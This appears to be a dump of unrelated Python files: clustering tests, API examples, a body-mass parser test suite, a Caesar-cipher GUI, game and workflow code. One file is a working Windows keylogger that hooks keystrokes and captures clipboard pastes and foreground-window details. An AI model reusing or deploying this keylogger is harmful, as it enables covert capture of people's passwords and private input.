algorithms=config.get('algorithms'),
categories=(categories or n_clusters),
export_path=export_path
)
def test(features_set, min_features, max_features, algorithms, categories, export_path):
n = len(features_set)
reports = []
features_combinations = []
i = 0
with std_out_err_redirect_tqdm() as orig_stdout:
sizes = trange(
min_features,
max_features + 1,
desc='Checking subsets of features',
file=orig_stdout,
dynamic_ncols=True
)
for r in sizes:
k = factorial(n) / (factorial(r) * factorial(n - r))
combinations = tqdm(
itertools.combinations(features_set, r),
total=int(k),
desc='Checking subsets of size %d' % r,
file=orig_stdout,
dynamic_ncols=True,
leave=False
)
for features in combinations:
if CLASSIFIED:
report = [
(' ', 'ALGORITHM', 'AMI', 'ARI', 'HOMOGENEITY', 'COMPLETENESS', 'TIME', 'ID')
]
else:
report = [
(' ', 'ALGORITHM', 'SILHOUETTE', 'CALINSKI-HARABAZ', 'TIME', 'ID')
]
for algorithm in algorithms:
try: # TODO remove this try-except
X, scaled_X, names, labels_pred, labels_true = LIBRARY.predict(
categories=categories,
n_categories=categories if isinstance(categories, int) else len(categories),
features=features,
algorithm=algorithm
)
except:
print('Error extracting features: %s' % str(features))
continue
report.append(report_algorithm(algorithm, scaled_X, labels_pred, labels_true, i))
if EXPORT:
export(
names,
labels_pred,
os.path.join(export_path, '%d.json' % i)
)
i += 1
reports.append(report)
features_combinations.append(features)
print()
mark_best_features(reports)
with open(os.path.join(export_path, 'log.txt'), 'w') as log_file:
for features, report in zip(features_combinations, reports):
log('%s' % str(features), log_file)
log(format_table(report), log_file)
|
"""
This example will ask you to select an Org, then prompt for a string and search for all App families whose name contains that string.
Only App families for which the Org has an active entitlement are shown.
It then prints the contained app versions with their type (interactive/compute) and app id.
These app ids can be used during sessions.start_session and compute.make_job_request.
Tested with Python 2.7.15, 3.7.1.
"""
import sys
import common
from athera.api import apps
from six.moves import input
class AppSearcher(object):
def __init__(self, logger, base_url, group_id, token):
self.logger = logger
self.base_url = base_url
self.group_id = group_id
self.token = token
def search_families(self, target):
self.logger.info("Searching families for {}".format(target))
apps_response = apps.get_app_families(self.base_url, self.group_id, self.token)
apps_dict = common.convert_response(apps_response)
if not apps_dict or 'families' not in apps_dict:
return None
# response contains one field:
# 'families'
apps_list = apps_dict['families']
# Filter the whole list with the supplied search term, case-insensitive
return list(filter(lambda x:target.lower() in x['name'].lower(), apps_list))
def main():
logger = common.setup_logging()
# What are we going to do?
logger.info(__doc__)
# Determine some arguments we need for api calls
base_url = common.get_base_url()
token = common.get_token_from_env()
if not token:
logger.fatal("ATHERA_API_TOKEN not set in env")
sys.exit(1)
# API calls all need an active group to define the 'Context' of the request. We only care about the top-level groups, orgs. Ask for user input.
selector = common.GroupSelector(logger, base_url, token)
group_id = selector.get_org()
if not group_id:
sys.exit(2)
# Feed this into the class which will query the app_families endpoint
searcher = AppSearcher(logger, base_url, group_id, token)
# Fetch the search term
target = input("-- Enter the app name (or part of) to search for: ")
# Run the search
families = searcher.search_families(target)
if families:
# List comprehension to filter out bundled apps. Bundled apps are legacy and should not be used
result = list(filter(lambda f: 'Bundled' not in f['name'], families))
if len(result) == 0:
logger.info("-- No apps found (bundled apps are ignored)")
# Pretty-print the output
for f in result:
logger.info("{:50} {}".format(f['name'], f['id']))
if 'apps' not in f:
logger.error("Missing apps data")
continue
apps = f['apps']
interactive_app = apps['interactive'] if 'interactive' in apps else None
compute_app = apps['compute'] if 'compute' in apps else None
if interactive_app:
for k, v in interactive_app.items():
logger.info("-- interactive {:35} {}".format(k, v))
if compute_app:
for k, v in compute_app.items():
logger.info("-- compute {:35} {}".format(k, v))
if __name__=="__main__":
main()
|
from localite.flow.ext import EXT
from localite.flow.loc import LOC
from localite.flow.mrk import MRK
from localite.flow.ctrl import CTRL
from localite.flow.payload import Queue
from localite.flow.ext import push
from subprocess import Popen, PIPE
import time
from typing import Tuple
def start_threaded(
loc_host: str, loc_port: int = 6666, address: Tuple[str, int] = ("127.0.0.1", 6667)
):
"""starts the whole flow-pipeline as threads within the local process
args
----
loc_host: str
the ip-adress of the localite PC
loc_port: int = 6666
the port of the localite Server
ext: Tuple[str, int] ("127.0.0.1", 6667)
the host:port where the localite-flow server will be setup
"""
queue = Queue()
locbox = Queue()
mrkbox = Queue()
ext = EXT(host=address[0], port=address[1], queue=queue)
ctrl = CTRL(queue=queue, loc=locbox, mrk=mrkbox)
loc = LOC(outbox=queue, inbox=locbox, address=(loc_host, loc_port))
mrk = MRK(mrk=mrkbox)
mrk.start()
loc.start()
loc.await_running()
mrk.await_running()
ctrl.start()
ctrl.await_running()
ext.start()
ext.await_running()
def kill(ext: Tuple[str, int] = ("127.0.0.1", 6667)):
""" kill the localite-flow at the given address, whether it runs as a subprocess or in a local thread
args
----
ext: Tuple[str, int] = ("127.0.0.1", 6667)
the host:port where the localite-flow server was setup
"""
push("cmd", "poison-pill", host=ext[0], port=ext[1])
def start(host: str):
"""starts the localite-flow as a subprocess
You can stop the subprocess gracefully using :meth:`~localite.flow.mitm.kill`
args
----
host: str
the ip address of the localite PC
"""
from localite.flow.ext import available
p = Popen(["localite-flow", "--host", host], stderr=PIPE, stdout=PIPE)
print("[", end="")
while not available(): # pragma no cover
print(".", end="")
time.sleep(0.5)
print("]")
return p
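# Rough usage sketch (the host value is hypothetical):
#   start_threaded(loc_host="192.168.1.50")   # run the whole pipeline in local threads
#   # ... interact with the flow server on 127.0.0.1:6667 ...
#   kill()                                    # send the poison-pill and shut it down
# Alternatively, `p = start("192.168.1.50")` launches the pipeline as a subprocess.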
|
from .structured_data import StructuredData
class WellInterface(StructuredData):
"""Place Holder for well specific data operations"""
pass
|
from ctypes import *
import pythoncom
import PyHook3
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
#
def get_current_process():
# Get the handle of the foreground (topmost) window
hwnd = user32.GetForegroundWindow()
# Get the process ID
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
# Store the process ID in a variable
process_id = "%d" % pid.value
# Allocate memory
executable = create_string_buffer(bytes.fromhex("00") * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
# Read the window title
windows_title = create_string_buffer(b"\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)
# Print the result
print("[ PID:%s-%s-%s]" %
(process_id, executable.value, windows_title.value))
# Close the handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
# Define the keystroke listener callback
def KeyStroke(event):
global current_window
# Check whether the target window has changed (if another window gains focus, listen to the new one)
if event.WindowName != current_window:
current_window = event.WindowName
# Call the helper above
get_current_process()
# Check whether the keystroke is a regular printable key (not a combination key, etc.)
if event.Ascii > 32 and event.Ascii < 127:
print(chr(event.Ascii))
else:
# If a Ctrl+V (paste) event is detected, record the clipboard contents
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print("[PASTE]-%s" % (pasted_value)),
else:
print("[%s]" % event.Key),
# Return True to keep listening for the next keystroke
return True
# Create and register the hook manager
kl = PyHook3.HookManager()
kl.KeyDown = KeyStroke
# Register the keyboard hook and pump messages
kl.HookKeyboard()
pythoncom.PumpMessages()
|
import os
import unittest
from je_gmail.core import GmailCore
class TestGmail(unittest.TestCase):
def setUp(self) -> None:
self.Gmail = GmailCore('/test')
def test_log(self):
with open(os.getcwd() + '/test/templates/Email_Template1_Picture.html', 'r+') as File:
content = (File.read())
self.Gmail.Gmail_API.send_mail_attach("410877027@mail.nknu.edu.tw", "410877027@mail.nknu.edu.tw", "Hello",
content, attach_file=os.getcwd() + '/test/images/firefox_test.png',
use_html=True)
File.close()
if __name__ == '__main__':
suite = (unittest.TestLoader().loadTestsFromTestCase(TestGmail))
unittest.TextTestRunner(verbosity=2).run(suite)
|
from tkinter import *
from tkinter import filedialog
from tkinter.filedialog import askopenfilename,asksaveasfilename
from PIL import Image, ImageTk
from dependencies.Cesar import *
from subviews.cesar.EncodeGui import EncodeGui
from subviews.cesar.DecodeGui import DecodeGui
from subviews.cesar.AnalyseGui import AnalyseGui
class CesarGui(Frame):
def __init__(self, master=None):
self.frame = Toplevel(master)
self.master = master
self.init_window()
#Creation of init_window
def init_window(self):
# changing the title of our master widget
#self.master.title("Cesar Encoder-Decoder")
self.frame.configure()
# creating labels
mainTitle = Label(self.frame,text="Cesar Encoder-Decoder",fg="red",font=("Helvetica", 20))
# placing labels
mainTitle.pack(fill=X)
# creating buttons instances
buttonFont = ("Helvetica", 15)
encodeButton = Button(self.frame, text="Encoder un fichier", command = self.encode,font=buttonFont)
decodeButton = Button(self.frame, text="Decoder un fichier", command = self.decode,font=buttonFont)
cryptanalButton = Button(self.frame, text="Cryptanaliser un fichier", command = self.cryptanal,font=buttonFont)
# placing the button on my window
encodeButton.pack(fill=X,padx=100,pady=10)
decodeButton.pack(fill=X,padx=100,pady=10)
cryptanalButton.pack(fill=X,padx=100,pady=10)
def encode(self):
encodeGui = EncodeGui(master = self.master)
def decode(self):
decodeGui = DecodeGui(master=self.master)
def cryptanal(self):
analyseGui = AnalyseGui(master=self.master)
|
"""Test body mass notations."""
# pylint: disable=missing-module-docstring,missing-class-docstring
# pylint: disable=missing-function-docstring,too-many-public-methods
import unittest
from traiter.util import shorten
from vertnet.parsers.body_mass import BODY_MASS
from vertnet.pylib.trait import Trait
class TestBodyMass(unittest.TestCase):
def test_parse_01(self):
self.assertEqual(
BODY_MASS.parse("762-292-121-76 2435.0g"),
[
Trait(
value=2435,
units="g",
units_inferred=False,
is_shorthand=True,
start=0,
end=22,
)
],
)
def test_parse_02(self):
self.assertEqual(
BODY_MASS.parse("TL (mm) 44,SL (mm) 38,Weight (g) 0.77 xx"),
[Trait(value=0.77, units="g", units_inferred=False, start=22, end=37)],
)
def test_parse_03(self):
self.assertEqual(
BODY_MASS.parse("Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-62g"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
start=41,
end=55,
)
],
)
def test_parse_04(self):
self.assertEqual(
BODY_MASS.parse("body mass=20 g"),
[Trait(value=20, units="g", units_inferred=False, start=0, end=14)],
)
def test_parse_05(self):
self.assertEqual(
BODY_MASS.parse("2 lbs. 3.1 - 4.5 oz "),
[
Trait(
value=[995.06, 1034.75],
ambiguous_key=True,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=19,
)
],
)
def test_parse_06(self):
self.assertEqual(
BODY_MASS.parse(
'{"totalLengthInMM":"x", "earLengthInMM":"20", '
'"weight":"[139.5] g" }'),
[
Trait(
value=139.5,
units="g",
units_inferred=False,
estimated_value=True,
start=47,
end=65,
)
],
)
def test_parse_07(self):
self.assertEqual(
BODY_MASS.parse(
'{"fat":"No fat", "gonads":"Testes 10 x 6 mm.", '
'"molt":"No molt",'
' "stomach contents":"Not recorded", "weight":"94 gr."'),
[Trait(value=94, units="gr", units_inferred=False, start=101, end=115)],
)
def test_parse_08(self):
self.assertEqual(
BODY_MASS.parse("Note in catalog: 83-0-17-23-fa64-35g"),
[
Trait(
value=35,
units="g",
units_inferred=False,
is_shorthand=True,
start=17,
end=36,
)
],
)
def test_parse_09(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"20.2g, SVL 89.13mm" }'),
[Trait(value=20.2, units="g", units_inferred=False, start=2, end=22)],
)
def test_parse_10(self):
self.assertEqual(
BODY_MASS.parse("Body: 15 g"),
[Trait(value=15, units="g", units_inferred=False, start=0, end=10)],
)
def test_parse_11(self):
self.assertEqual(
BODY_MASS.parse("82-00-15-21-tr7-fa63-41g"),
[
Trait(
value=41,
units="g",
units_inferred=False,
is_shorthand=True,
start=0,
end=24,
)
],
)
def test_parse_12(self):
self.assertEqual(
BODY_MASS.parse("weight=5.4 g; unformatted measurements=77-30-7-12=5.4"),
[
Trait(value=5.4, units="g", units_inferred=False, start=0, end=12),
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=39,
end=53,
),
],
)
def test_parse_13(self):
self.assertEqual(
BODY_MASS.parse("unformatted measurements=77-30-7-12=5.4; weight=5.4;"),
[
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=25,
end=39,
),
Trait(value=5.4, units=None, units_inferred=True, start=41, end=51),
],
)
def test_parse_14(self):
self.assertEqual(
BODY_MASS.parse('{"totalLengthInMM":"270-165-18-22-31", '),
[
Trait(
value=31,
units=None,
units_inferred=True,
is_shorthand=True,
start=20,
end=36,
)
],
)
def test_parse_15(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"143-63-20-17=13 g" }'),
[
Trait(
value=13,
units="g",
units_inferred=False,
is_shorthand=True,
start=17,
end=34,
)
],
)
def test_parse_16(self):
self.assertEqual(
BODY_MASS.parse("143-63-20-17=13"),
[
Trait(
value=13,
units=None,
units_inferred=True,
is_shorthand=True,
start=0,
end=15,
)
],
)
def test_parse_17(self):
self.assertEqual(
BODY_MASS.parse(
"reproductive data: Testes descended -10x7 mm; sex: "
"male; unformatted measurements: 181-75-21-18=22 g"),
[
Trait(
value=22,
units="g",
units_inferred=False,
is_shorthand=True,
start=83,
end=100,
)
],
)
def test_parse_18(self):
self.assertEqual(
BODY_MASS.parse('{ "massingrams"="20.1" }'),
[Trait(value=20.1, units="grams", units_inferred=False, start=3, end=21)],
)
def test_parse_19(self):
self.assertEqual(
BODY_MASS.parse(
' {"gonadLengthInMM_1":"10", "gonadLengthInMM_2":"6", '
'"weight":"1,192.0" }'),
[Trait(value=1192, units=None, units_inferred=True, start=54, end=70)],
)
def test_parse_20(self):
self.assertEqual(
BODY_MASS.parse('"weight: 20.5-31.8'),
[
Trait(
value=[20.5, 31.8],
units=None,
units_inferred=True,
start=1,
end=18)
],
)
def test_parse_21(self):
self.assertEqual(
BODY_MASS.parse('"weight: 20.5-32'),
[Trait(value=[20.5, 32], units=None, units_inferred=True, start=1, end=16)],
)
def test_parse_22(self):
self.assertEqual(
BODY_MASS.parse('"weight: 21-31.8'),
[Trait(value=[21, 31.8], units=None, units_inferred=True, start=1, end=16)],
)
def test_parse_23(self):
self.assertEqual(
BODY_MASS.parse('"weight: 21-32'),
[Trait(value=[21, 32], units=None, units_inferred=True, start=1, end=14)],
)
def test_parse_24(self):
self.assertEqual(BODY_MASS.parse("Specimen #'s - 5491,5492"), [])
def test_parse_25(self):
self.assertEqual(
BODY_MASS.parse("weight=5.4 g; unformatted measurements=77-x-7-12=5.4"),
[
Trait(value=5.4, units="g", units_inferred=False, start=0, end=12),
Trait(
value=5.4,
units=None,
units_inferred=True,
is_shorthand=True,
start=39,
end=52,
),
],
)
def test_parse_26(self):
self.assertEqual(BODY_MASS.parse("c701563b-dbd9-4500-184f-1ad61eb8da11"), [])
def test_parse_27(self):
self.assertEqual(
BODY_MASS.parse("body mass=0 g"),
[Trait(value=0, units="g", units_inferred=False, start=0, end=13)],
)
def test_parse_28(self):
self.assertEqual(
BODY_MASS.parse("2 lbs. 3.1 oz "),
[
Trait(
value=995.06,
ambiguous_key=True,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=13,
)
],
)
def test_parse_29(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62]g"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
estimated_value=True,
start=41,
end=57,
)
],
)
def test_parse_30(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62g]"),
[
Trait(
value=62,
units="g",
units_inferred=False,
is_shorthand=True,
estimated_value=True,
start=41,
end=57,
)
],
)
def test_parse_31(self):
self.assertEqual(
BODY_MASS.parse(
"Note in catalog: Mus. SW Biol. NK 30009; 91-0-17-22-[62] x"),
[],
)
def test_parse_32(self):
self.assertEqual(
BODY_MASS.parse("wt=10 g"),
[Trait(value=10, units="g", units_inferred=False, start=0, end=7)],
)
def test_parse_33(self):
self.assertEqual(
BODY_MASS.parse("w.t.=10 g"),
[Trait(value=10, units="g", units_inferred=False, start=0, end=9)],
)
def test_parse_34(self):
self.assertEqual(
BODY_MASS.parse(
"DATA HISTORY: Inventory catalogued/verified by "
"Collections staff (2008-2010 inventory). Record last "
"updated in Excel (prior to Arctos migration) by Dawn "
"R. Roberts (2013-11-30). Date listed as entered in "
"original FileMaker database: 1988-07-29."),
[],
)
def test_parse_35(self):
self.assertEqual(
BODY_MASS.parse("; weight = [50.8] g ;"),
[
Trait(
value=50.8,
units="g",
units_inferred=False,
estimated_value=True,
start=2,
end=19,
)
],
)
def test_parse_36(self):
self.assertEqual(BODY_MASS.parse('{"measurements":"242-109-37-34=N/D" }'), [])
def test_parse_37(self):
self.assertEqual(
BODY_MASS.parse("ear from notch=9 mm; weight=.65 kg; reproductive data"),
[Trait(value=650, units="kg", units_inferred=False, start=21, end=34)],
)
def test_parse_38(self):
self.assertEqual(
BODY_MASS.parse("; weight=22 oz; Verbatim weight=1lb 6oz;"),
[
Trait(value=623.69, units="oz", units_inferred=False, start=2, end=14),
Trait(
value=623.69,
units=["lb", "oz"],
units_inferred=False,
start=25,
end=39,
),
],
)
def test_parse_39(self):
self.assertEqual(BODY_MASS.parse("bacu wt=0.09"), [])
def test_parse_40(self):
self.assertEqual(BODY_MASS.parse("femur wt=1.05"), [])
def test_parse_41(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2014-10-29", "relatedresourceid": '
'"eeba8b10-040e-4477-a0a6-870102b56234;'
'abbf14f5-1a7c-48f6-8f2f-2a8af53c8c86"}'),
[],
)
def test_parse_42(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2007-05-27", "relatedresourceid": '
'"92bc5a20-577e-4504-aab6-bb409d06871a;'
'0460ccc4-a461-43ec-86b6-1c252377b126"}'),
[],
)
def test_parse_43(self):
self.assertEqual(
BODY_MASS.parse(
'{"created": "2014-10-29", "relatedresourceid": '
'"57d3efd8-2b9c-4952-8976-e27401a01251;'
'8a35be5e-27fb-4875-81f6-42a5d7787760"}'),
[],
)
def test_parse_44(self):
self.assertEqual(
BODY_MASS.parse("Weight=22 lbs., 7 oz.; Length=41 in. T.L."),
[
Trait(
value=10177.48,
units=["lbs", "oz"],
units_inferred=False,
start=0,
end=20,
)
],
)
def test_parse_45(self):
self.assertEqual(
BODY_MASS.parse('{"earLengthInmm":"X", "weightInlbs":"22"}'),
[Trait(value=9979.03, units="lbs", units_inferred=False, start=23, end=39)],
)
def test_parse_46(self):
self.assertEqual(
BODY_MASS.parse('{"measurements":"90-30-16-7=6.9MGS" }'),
[
Trait(
value=0.01,
units="MGS",
units_inferred=False,
is_shorthand=True,
start=17,
end=34,
)
],
)
def test_parse_47(self):
self.assertEqual(BODY_MASS.parse("; unformatted measurements=g 0.24 mm ;"), [])
def test_parse_48(self):
self.assertEqual(
BODY_MASS.parse("143-63-20-17-22=13"),
[
Trait(
value=13,
units=None,
units_inferred=True,
is_shorthand=True,
start=0,
end=18,
)
],
)
def test_parse_49(self):
self.assertEqual(
BODY_MASS.parse(
'{"earLengthInMM":"15 mm", "hindfootLengthInMM":'
'"hind_foot_length]", "measurements":"38", "tail":"40 mm", '
'"totalLength":"96 mm", "weight":"11.7 g" }'),
[Trait(value=11.7, units="g", units_inferred=False, start=129, end=144)],
)
def test_parse_50(self):
self.assertEqual(BODY_MASS.parse("Other Measurements: ratio=.33"), [])
def test_parse_51(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
Body: 12 gm; Body and tail: 109 mm; Tail: 43 mm;
Hind Foot: 11 mm; Ear: 13 mm""")),
[Trait(value=12, units="gm", units_inferred=False, start=0, end=11)],
)
def test_parse_52(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
{"measurements":"78-39-5-14-8(TR)-30(FA)",
"weightInGrams":"3.5" }""")),
[{
"start": 44,
"end": 63,
"units": "Grams",
"value": 3.5,
"units_inferred": False,
}],
)
def test_parse_53(self):
self.assertEqual(
BODY_MASS.parse(
shorten(
"""
all measurements given in specimens 11041-11070 are:
""")),
[],
)
|
# This is a simple script to check whether your parameter file is valid. Run it with the location of your parameter
# file as a command line argument (i.e. 'python testParams.py PATH/TO/PARAMFILE'). If successful, a message displaying
# the custom parameters specified will be printed. If validation fails, an error message specifying the cause of the
# validation error will be printed.
import sys
import pykwalify.core
from radiomics import getParameterValidationFiles
def main(paramsFile):
schemaFile, schemaFuncs = getParameterValidationFiles()
c = pykwalify.core.Core(source_file=paramsFile, schema_files=[schemaFile], extensions=[schemaFuncs])
try:
params = c.validate()
print('Parameter validation successful!\n\n'
'###Enabled Features###\n%s\n'
'###Enabled Image Types###\n%s\n'
'###Settings###\n%s' % (params['featureClass'], params['imageType'], params['setting']))
except Exception as e:
print('Parameter validation failed!\n%s' % e)
if __name__ == '__main__' and len(sys.argv) > 1:
main(sys.argv[1])
|
import cauldron as cd
from bokeh.plotting import figure
plot = figure()
plot.line(x=[1, 2, 3], y=[3, 4, 5])
plot.scatter(x=[1, 2, 3], y=[3, 4, 5])
cd.display.bokeh(plot)
|
import pandas as pd
from leaderboard.constants import scoreWeights
from leaderboard.constants import contribTypes
def get_final_score_table(
intermediate_score_df: pd.DataFrame, user_list: list
) -> pd.DataFrame:
""" Returns final score table dataframe
Args:
df: pandas DataFrame - Intermediate Score Table containing contribution counts of all sub types for given users
"""
intermediate_score_df.set_index("user_name", inplace=True)
final_score_table = pd.DataFrame(
columns=[
"User Name",
contribTypes.T1,
contribTypes.T2,
contribTypes.T3,
contribTypes.T4,
"Total Score",
]
)
for user_name in user_list:
t1_score, t2_score, t3_score, t4_score, total_score = (
0,
0,
0,
0,
0,
)
try:
user_row = intermediate_score_df.loc[user_name]
t1_score = (
user_row.t1s1 * scoreWeights.T1S1 + user_row.t1s2 * scoreWeights.T1S2
)
t2_score = (
user_row.t2s1 * scoreWeights.T2S1
+ user_row.t2s2 * scoreWeights.T2S2
+ user_row.t2s3 * scoreWeights.T2S3
+ user_row.t2s4 * scoreWeights.T2S4
)
t3_score = (
user_row.t3s1 * scoreWeights.T3S1 + user_row.t3s2 * scoreWeights.T3S2
)
t4_score = (
user_row.t4s1 * scoreWeights.T4S1
+ user_row.t4s2 * scoreWeights.T4S2
+ user_row.t4s3 * scoreWeights.T4S3
+ user_row.t4s4 * scoreWeights.T4S4
)
total_score = t1_score + t2_score + t3_score + t4_score
final_score_table = final_score_table.append(
{
"User Name": user_name,
contribTypes.T1: t1_score,
contribTypes.T2: t2_score,
contribTypes.T3: t3_score,
contribTypes.T4: t4_score,
"Total Score": total_score,
},
ignore_index=True,
)
except KeyError:
final_score_table = final_score_table.append(
{
"User Name": user_name,
contribTypes.T1: t1_score,
contribTypes.T2: t2_score,
contribTypes.T3: t3_score,
contribTypes.T4: t4_score,
"Total Score": total_score,
},
ignore_index=True,
)
return final_score_table.sort_values(
by=["Total Score", "User Name"], ascending=[False, True]
)
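# Minimal usage sketch with hypothetical data (column names follow the attributes
# accessed above: t1s1, t1s2, t2s1..t2s4, t3s1, t3s2, t4s1..t4s4).
if __name__ == "__main__":
    intermediate = pd.DataFrame([
        {"user_name": "alice", "t1s1": 2, "t1s2": 1, "t2s1": 0, "t2s2": 3, "t2s3": 0,
         "t2s4": 1, "t3s1": 0, "t3s2": 0, "t4s1": 1, "t4s2": 0, "t4s3": 0, "t4s4": 2},
    ])
    # "bob" is absent from the intermediate table, so he exercises the KeyError branch above.
    print(get_final_score_table(intermediate, ["alice", "bob"]))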
|
"""
Define how `Players` make moves.
"""
from typing import List
from literature.actor import Actor
from literature.card import Card
from literature.constants import SETS
class Move:
"""
An expression that indicates when one `Player` asks another for a `Card`.
Examples
--------
>>> move = player_0.asks(player_1).to_give(CardName(3, Suit.SPADES))
"""
def __init__(self,
interrogator: Actor,
respondent: Actor,
card: Card.Name):
if card in interrogator.hand:
raise ValueError("A player cannot ask for a card they possess")
if sum([
Card.Name(c, card.suit) in interrogator.hand
for c in SETS[card.half_suit().half]
]) == 0:
raise ValueError("The player needs at least one card in the set")
self.interrogator = interrogator
self.respondent = respondent
self.card = card
def serialize(self) -> List[int]:
""" Serialize this `Move` into a list of integers. """
return [
self.interrogator.unique_id,
self.respondent.unique_id,
self.card.suit.value,
self.card.rank.value
]
def __repr__(self):
return "{0} requested the {1} from {2}".format(self.interrogator,
self.card,
self.respondent)
class Request:
"""
A `Request` from one `Player` for another `Player`'s `Card`, without
specifying the `Card`. This should be instantiated using `Player.asks`.
"""
def __init__(self, interrogator: Actor, respondent: Actor):
if interrogator.unique_id % 2 == respondent.unique_id % 2:
raise ValueError("A player cannot ask their teammate for a card")
self.interrogator = interrogator
self.respondent = respondent
def to_give(self, card: Card.Name) -> Move:
return Move(self.interrogator, self.respondent, card)
|
from enum import IntEnum
class ClusterPyError(IntEnum):
ciao_not_running = -1
sources_or_exclude_not_found = 1
|
# https://www.codechef.com/LRNDSA01/problems/FLOW007
for T in range(int(input())): print(int(input()[::-1]))
|
#!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Wen Guan, <wen.guan@cern.ch>, 2020 - 2021
import copy
import datetime
import logging
import inspect
import random
import time
import uuid
from idds.common import exceptions
from idds.common.constants import IDDSEnum, WorkStatus
from idds.common.utils import json_dumps, setup_logging, get_proxy
from idds.common.utils import str_to_date
from .base import Base
from .work import Work, Collection
setup_logging(__name__)
class ConditionOperator(IDDSEnum):
And = 0
Or = 1
class ConditionTrigger(IDDSEnum):
NotTriggered = 0
ToTrigger = 1
Triggered = 2
class CompositeCondition(Base):
def __init__(self, operator=ConditionOperator.And, conditions=[], true_works=None, false_works=None, logger=None):
self._conditions = []
self._true_works = []
self._false_works = []
super(CompositeCondition, self).__init__()
self.internal_id = str(uuid.uuid4())[:8]
self.template_id = self.internal_id
# self.template_id = str(uuid.uuid4())[:8]
self.logger = logger
if self.logger is None:
self.setup_logger()
if conditions is None:
conditions = []
if true_works is None:
true_works = []
if false_works is None:
false_works = []
if conditions and type(conditions) not in [tuple, list]:
conditions = [conditions]
if true_works and type(true_works) not in [tuple, list]:
true_works = [true_works]
if false_works and type(false_works) not in [tuple, list]:
false_works = [false_works]
self.validate_conditions(conditions)
self.operator = operator
self.conditions = []
self.true_works = []
self.false_works = []
self.conditions = conditions
self.true_works = true_works
self.false_works = false_works
def get_class_name(self):
return self.__class__.__name__
def get_internal_id(self):
return self.internal_id
def get_template_id(self):
return self.template_id
def copy(self):
new_cond = copy.deepcopy(self)
return new_cond
def __deepcopy__(self, memo):
logger = self.logger
self.logger = None
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Deep copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
self.logger = logger
result.logger = logger
return result
@property
def conditions(self):
# return self.get_metadata_item('true_works', [])
return self._conditions
@conditions.setter
def conditions(self, value):
self._conditions = value
@property
def true_works(self):
# return self.get_metadata_item('true_works', [])
return self._true_works
@true_works.setter
def true_works(self, value):
self._true_works = value
true_work_meta = self.get_metadata_item('true_works', {})
for work in value:
if work is None:
continue
if isinstance(work, Work):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, CompositeCondition):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, Workflow):
if work.get_internal_id() not in true_work_meta:
true_work_meta[work.get_internal_id()] = {'triggered': False}
self.add_metadata_item('true_works', true_work_meta)
@property
def false_works(self):
# return self.get_metadata_item('false_works', [])
return self._false_works
@false_works.setter
def false_works(self, value):
self._false_works = value
false_work_meta = self.get_metadata_item('false_works', {})
for work in value:
if work is None:
continue
if isinstance(work, Work):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, CompositeCondition):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
elif isinstance(work, Workflow):
if work.get_internal_id() not in false_work_meta:
false_work_meta[work.get_internal_id()] = {'triggered': False}
self.add_metadata_item('false_works', false_work_meta)
def validate_conditions(self, conditions):
if type(conditions) not in [tuple, list]:
raise exceptions.IDDSException("conditions must be list")
for cond in conditions:
assert(inspect.ismethod(cond))
def add_condition(self, cond):
assert(inspect.ismethod(cond))
assert(isinstance(cond.__self__, Work))
# self.conditions.append({'condition': cond, 'current_work': cond.__self__})
self._conditions.append(cond)
def load_metadata(self):
# conditions = self.get_metadata_item('conditions', [])
# true_works_meta = self.get_metadata_item('true_works', {})
# false_works_meta = self.get_metadata_item('false_works', {})
pass
def to_dict(self):
# print('to_dict')
ret = {'class': self.__class__.__name__,
'module': self.__class__.__module__,
'attributes': {}}
for key, value in self.__dict__.items():
# print(key)
# print(value)
# if not key.startswith('__') and not key.startswith('_'):
if not key.startswith('__'):
if key == 'logger':
value = None
elif key == '_conditions':
new_value = []
for cond in value:
if inspect.ismethod(cond):
if isinstance(cond.__self__, Work):
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
elif isinstance(cond.__self__, CompositeCondition):
new_cond = {'idds_method': cond.__name__,
'idds_method_condition': cond.__self__.to_dict()}
elif isinstance(cond.__self__, Workflow):
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
else:
new_cond = {'idds_method': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
else:
if hasattr(cond, '__self__'):
new_cond = {'idds_attribute': cond.__name__,
'idds_method_internal_id': cond.__self__.get_internal_id()}
